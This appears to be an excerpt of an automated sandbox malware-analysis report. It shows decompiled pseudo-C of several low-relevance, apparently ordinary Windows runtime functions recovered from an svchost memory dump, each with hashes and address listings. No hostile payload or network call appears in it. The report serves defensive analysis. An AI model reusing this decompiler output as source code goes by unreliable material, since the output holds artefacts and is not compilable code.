                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0468d600b39b82b76da3a3c33ffdfbb0e7e54dacb97b8a532e2cf0e4db3a93db
                        • Instruction ID: 079ca40c3f92958fe78d54bc738c14a285916f3e66a2e0f10466ca356da1f763
                        • Opcode Fuzzy Hash: 0468d600b39b82b76da3a3c33ffdfbb0e7e54dacb97b8a532e2cf0e4db3a93db
                        • Instruction Fuzzy Hash: 3B51EE75206741AFC721EF28C941BABFBE8FF85710F14092AE4958BA91E770E848C795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03052AE4 Relevance: .2, Instructions: 159COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E03052AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x3118204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x3118208; // 0x3118207
				_t8 = _t57 + 0x3118208; // 0x3118207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x3118450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x311821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x3116d5c; // 0x7f8b0654
							_t72 =  *0x3116d5c; // 0x7f8b0654
							_t75 =  *0x3116d5c; // 0x7f8b0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x3116d5c; // 0x7f8b0654
							_t84 =  *0x3116d5c; // 0x7f8b0654
							_t87 =  *0x3116d5c; // 0x7f8b0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0306F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                        0x03052ae4
                        0x03052aec
                        0x03052aef
                        0x03052af4
                        0x03052af7
                        0x03052afd
                        0x03052b92
                        0x03052b92
                        0x03052b97
                        0x03052b9c
                        0x03052b9c
                        0x03052b03
                        0x03052b06
                        0x03052b09
                        0x03052b09
                        0x03052b0f
                        0x03052b15
                        0x03052b15
                        0x03052b1b
                        0x03052b1e
                        0x03052b21
                        0x03052b26
                        0x03052b29
                        0x03052b81
                        0x03052b84
                        0x03052c0e
                        0x03052c15
                        0x03052c24
                        0x03052c24
                        0x03052b8a
                        0x03052b8a
                        0x03052b8a
                        0x03052b8a
                        0x03052b90
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03052b4a
                        0x03052b4a
                        0x03052b4d
                        0x03052b53
                        0x00000000
                        0x00000000
                        0x03052b55
                        0x03052b58
                        0x03052bb7
                        0x03095d1b
                        0x03095d37
                        0x03095d47
                        0x03095d53
                        0x03052bbd
                        0x03052bbd
                        0x03052bbd
                        0x03052bb7
                        0x03052b5d
                        0x03052c2f
                        0x03095d5b
                        0x03095d77
                        0x03095d87
                        0x03095d93
                        0x03052c35
                        0x03052c35
                        0x03052c35
                        0x03052c2f
                        0x03052b65
                        0x03052b9f
                        0x03052ba2
                        0x03052b67
                        0x03052b67
                        0x03052b69
                        0x03052b6b
                        0x03052b6e
                        0x03052bc9
                        0x03052bcc
                        0x03052bcf
                        0x03052bd4
                        0x03052bd6
                        0x03052bd6
                        0x03052bdb
                        0x03052c02
                        0x03052c05
                        0x03052c07
                        0x00000000
                        0x03052c07
                        0x03052be0
                        0x03052c00
                        0x03052c3f
                        0x03052c3f
                        0x00000000
                        0x03052c00
                        0x03052be5
                        0x03052be7
                        0x03052bec
                        0x03052bf4
                        0x03052bf6
                        0x00000000
                        0x03052bf6
                        0x03052b70
                        0x03052b76
                        0x03052b2b
                        0x03052b2b
                        0x03052b2d
                        0x03052b2f
                        0x03052b32
                        0x03052b35
                        0x03052b3a
                        0x00000000
                        0x03052b40
                        0x03052b43
                        0x03052b45
                        0x03052b47
                        0x03052b4a
                        0x03052b4d
                        0x03052b53
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03052b53
                        0x03052b78
                        0x03052b78
                        0x03052b7b
                        0x03052b7e
                        0x00000000
                        0x03052b7e
                        0x03052b76
                        0x03052ba5
                        0x03052ba5
                        0x03052ba8
                        0x03052bad
                        0x00000000
                        0x00000000
                        0x03052baf
                        0x03052baf
                        0x03052bc2
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ecf9fd7a436f7b60c48016a388d316fd5338e55b7dad063c5daa3dd12ba9abfe
                        • Instruction ID: 40daa9a92d38175e6d7207532e0b37b586d12f94ea6b50c99252af069fbc4c8c
                        • Opcode Fuzzy Hash: ecf9fd7a436f7b60c48016a388d316fd5338e55b7dad063c5daa3dd12ba9abfe
                        • Instruction Fuzzy Hash: 95518E76A011258FDB18DF1CC8909BEB7B9BF88700715895AFC46AB314D731AA91CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030EAE44 Relevance: .2, Instructions: 152COMMON
                        Download Yara Rule
                        C-Code - Quality: 86%
                        			E030EAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E030EC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E030EACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E030EFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E030EEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E03047D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E030E1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E030F1536(0x3118ae4, (_t74 -  *0x3118b04 >> 0x14) + (_t74 -  *0x3118b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L030EC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E030EA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E030CCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E030EACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                        0x030eae44
                        0x030eae4c
                        0x030eae53
                        0x030eae55
                        0x030eae5c
                        0x030eae64
                        0x030eae68
                        0x030eae75
                        0x030eae75
                        0x030eae78
                        0x030eae7a
                        0x030eae7c
                        0x030eae7f
                        0x030eaea8
                        0x030eaeab
                        0x030eaead
                        0x00000000
                        0x00000000
                        0x030eaeb3
                        0x030eaeb8
                        0x030eaebb
                        0x030eaebd
                        0x00000000
                        0x030eae81
                        0x030eae88
                        0x030eae8f
                        0x030eae9b
                        0x030eae96
                        0x030eae96
                        0x030eae96
                        0x030eaea0
                        0x030eaea3
                        0x030eaebf
                        0x030eaebf
                        0x030eaec3
                        0x030eaec9
                        0x030eaf0d
                        0x030eaf14
                        0x030eaf3d
                        0x030eaf3d
                        0x030eaf41
                        0x030eaf44
                        0x030eaf67
                        0x030eaf67
                        0x030eaf6a
                        0x030eafca
                        0x030eafd1
                        0x00000000
                        0x030eafd1
                        0x030eaf6c
                        0x030eaf6d
                        0x030eaf75
                        0x030eaf7c
                        0x030eaf7e
                        0x030eaf80
                        0x030eaf85
                        0x030eaf87
                        0x030eaf99
                        0x030eaf89
                        0x030eaf92
                        0x030eaf92
                        0x030eaf9e
                        0x030eafa1
                        0x030eafa3
                        0x030eafa9
                        0x030eafb0
                        0x030eafb2
                        0x030eafb4
                        0x030eafbc
                        0x030eafbc
                        0x030eafb4
                        0x030eafb0
                        0x00000000
                        0x030eafa1
                        0x030eaf4f
                        0x030eaf57
                        0x030eaf5c
                        0x030eaf5e
                        0x00000000
                        0x00000000
                        0x030eaf60
                        0x030eaf64
                        0x030eaf64
                        0x00000000
                        0x030eaf64
                        0x030eaf1a
                        0x030eaf25
                        0x00000000
                        0x00000000
                        0x030eaf27
                        0x030eaf28
                        0x030eaf33
                        0x00000000
                        0x030eaed0
                        0x030eaed0
                        0x030eaed2
                        0x030eaee1
                        0x030eaee4
                        0x00000000
                        0x00000000
                        0x030eaee6
                        0x030eaeec
                        0x00000000
                        0x00000000
                        0x030eaefb
                        0x030eaf07
                        0x030eafd3
                        0x030eafdb
                        0x030eafdb
                        0x00000000
                        0x030eaf07
                        0x030eaed6
                        0x030eaed8
                        0x030eaedf
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030eaedf
                        0x030eaec9

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 94908716882e2ec81f00da3df1ae6c1912965186e4df8a9dbfc9835898105622
                        • Instruction ID: bd53df244fa9741acb4f71e494c73646042c5214cdb409b44e8d57c8403b7f96
                        • Opcode Fuzzy Hash: 94908716882e2ec81f00da3df1ae6c1912965186e4df8a9dbfc9835898105622
                        • Instruction Fuzzy Hash: A541B5B17067119FD72ADB69C894B7BF7DAAFC8620F084619F8168B390DB34D841C691
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0304DBE9 Relevance: .1, Instructions: 149COMMON
                        Download Yara Rule
                        C-Code - Quality: 86%
                        			E0304DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0302CC50(E03024510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E03047D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E030F8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E03042280(_t58, _v44);
						E0304DD82(_v44, _t102, _t98);
						E0304B944(_t102, _v5);
						return E0303FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x3118628; // 0x0
							_v28 = _t67;
							_t68 =  *0x311862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x3118628; // 0x0
						_t105 = _v28;
						_t80 =  *0x311862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x30efb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                        0x0304dbe9
                        0x0304dbf2
                        0x0304dbf7
                        0x0304dbf9
                        0x0304dbfc
                        0x0304dc00
                        0x0304dc03
                        0x0304dc14
                        0x0304dd54
                        0x0304dd54
                        0x0304dd54
                        0x0304dc18
                        0x0304dc1d
                        0x0304dc1d
                        0x0304dc32
                        0x0304dc3b
                        0x0304dc3e
                        0x0304dc46
                        0x0304dd5b
                        0x0304dd62
                        0x0304dd64
                        0x0304dd67
                        0x0304dd69
                        0x0304dd6b
                        0x0304dd6e
                        0x0304dd70
                        0x0304dd73
                        0x0304dd73
                        0x00000000
                        0x0304dc4c
                        0x0304dc4e
                        0x03093ae3
                        0x03093ae8
                        0x03093aea
                        0x0304dce7
                        0x0304dce9
                        0x0304dcec
                        0x0304dcee
                        0x0304dcf0
                        0x0304dcf3
                        0x0304dcf5
                        0x03093af2
                        0x03093af5
                        0x03093af5
                        0x0304dd06
                        0x0304dd08
                        0x0304dd0b
                        0x0304dd12
                        0x03093b08
                        0x0304dd18
                        0x0304dd18
                        0x0304dd18
                        0x0304dd20
                        0x0304dd23
                        0x03093b16
                        0x03093b16
                        0x0304dd29
                        0x0304dd2d
                        0x0304dd36
                        0x0304dd40
                        0x0304dd51
                        0x0304dd51
                        0x0304dc54
                        0x0304dc59
                        0x0304dc59
                        0x0304dc5e
                        0x0304dc5e
                        0x0304dc63
                        0x0304dc66
                        0x0304dc6b
                        0x0304dc78
                        0x0304dc7b
                        0x0304dc81
                        0x0304dc81
                        0x0304dc83
                        0x0304dc89
                        0x00000000
                        0x00000000
                        0x0304dd7b
                        0x0304dd7b
                        0x0304dc8f
                        0x0304dc8f
                        0x0304dc92
                        0x0304dc99
                        0x0304dc9f
                        0x0304dca5
                        0x0304dcaa
                        0x0304dcaa
                        0x0304dcb3
                        0x0304dcb8
                        0x0304dcbb
                        0x0304dcc1
                        0x0304dccf
                        0x0304dcd2
                        0x0304dcd5
                        0x0304dcd7
                        0x0304dcda
                        0x0304dcdc
                        0x0304dcdc
                        0x0304dce2
                        0x0304dce4
                        0x00000000
                        0x0304dce4

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 549092b8c6da42ba8ba6d943d4935a63f7d7b72aea267150110a53dac5af9001
                        • Instruction ID: 8163cc363a8a6a251e5d8eb06269c20da8ced2b6db658324b577f60169f51b65
                        • Opcode Fuzzy Hash: 549092b8c6da42ba8ba6d943d4935a63f7d7b72aea267150110a53dac5af9001
                        • Instruction Fuzzy Hash: 2651B2B5A02216DFCB14DF68C490A9EFBF5BF88310F2485AAD555AB345DB30AE44CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0303EF40 Relevance: .1, Instructions: 147COMMON
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E0303EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E03029080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7738c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E03022D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                        0x0303ef4b
                        0x0303ef4d
                        0x0303ef57
                        0x0303f0bd
                        0x0303f0c2
                        0x0303f0d2
                        0x0303f0d2
                        0x0303f0c2
                        0x0303ef5d
                        0x0303ef5f
                        0x0303ef67
                        0x0303ef6a
                        0x0303ef6d
                        0x0303ef74
                        0x0303ef7f
                        0x0303ef82
                        0x0303ef82
                        0x0303ef86
                        0x0303ef88
                        0x0303ef8c
                        0x0303ef8f
                        0x0303ef8f
                        0x0303ef8f
                        0x00000000
                        0x0303ef91
                        0x0303ef93
                        0x0303efc4
                        0x0303efc4
                        0x0303efc4
                        0x0303efca
                        0x0303efd0
                        0x0303f0a6
                        0x00000000
                        0x00000000
                        0x0303f0af
                        0x0308bb06
                        0x0308bb0a
                        0x0303f0b5
                        0x0303f0b5
                        0x0303f0b5
                        0x0303f0b5
                        0x00000000
                        0x0303efd6
                        0x0303efd9
                        0x0303f0de
                        0x0303f0e2
                        0x0303efdf
                        0x0303efdf
                        0x0303efdf
                        0x0303efe5
                        0x0308bafc
                        0x0308bafc
                        0x0303efe5
                        0x0303efeb
                        0x0303efed
                        0x0303f00f
                        0x0303f011
                        0x0303f01a
                        0x0303f01d
                        0x0303f021
                        0x0303f028
                        0x0303f029
                        0x0303f029
                        0x0303f02c
                        0x00000000
                        0x0303f02c
                        0x0303eff3
                        0x0303eff9
                        0x0303f0ea
                        0x0303f0ed
                        0x0303f0ef
                        0x00000000
                        0x0303f0ef
                        0x0303f003
                        0x0308bb12
                        0x0303f045
                        0x0303f049
                        0x0303f051
                        0x0303f09e
                        0x0303f0a0
                        0x0303f0a0
                        0x0303f09e
                        0x0303f053
                        0x0303f064
                        0x0303f064
                        0x0303f06b
                        0x0308bb1a
                        0x0308bb1a
                        0x0303f071
                        0x0303f071
                        0x0303f07d
                        0x0303f082
                        0x0303f08f
                        0x0303f08f
                        0x0303f009
                        0x0303f00d
                        0x00000000
                        0x0303f00d
                        0x0303efd0
                        0x0303ef97
                        0x0303efa5
                        0x0303efaa
                        0x00000000
                        0x0303efac
                        0x0303efac
                        0x0303efac
                        0x00000000
                        0x0303efb2
                        0x0303f036
                        0x0303f03a
                        0x0303f040
                        0x0303f090
                        0x00000000
                        0x0303f092
                        0x0303f042
                        0x00000000
                        0x0303f042
                        0x0303efb7
                        0x0303efb9
                        0x0303efbc
                        0x0303efb0
                        0x0303efb0
                        0x00000000
                        0x0303efbe
                        0x0303efbe
                        0x0303efc1
                        0x00000000
                        0x0303efc1
                        0x0303efbc
                        0x0303efaa
                        0x0303ef91

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
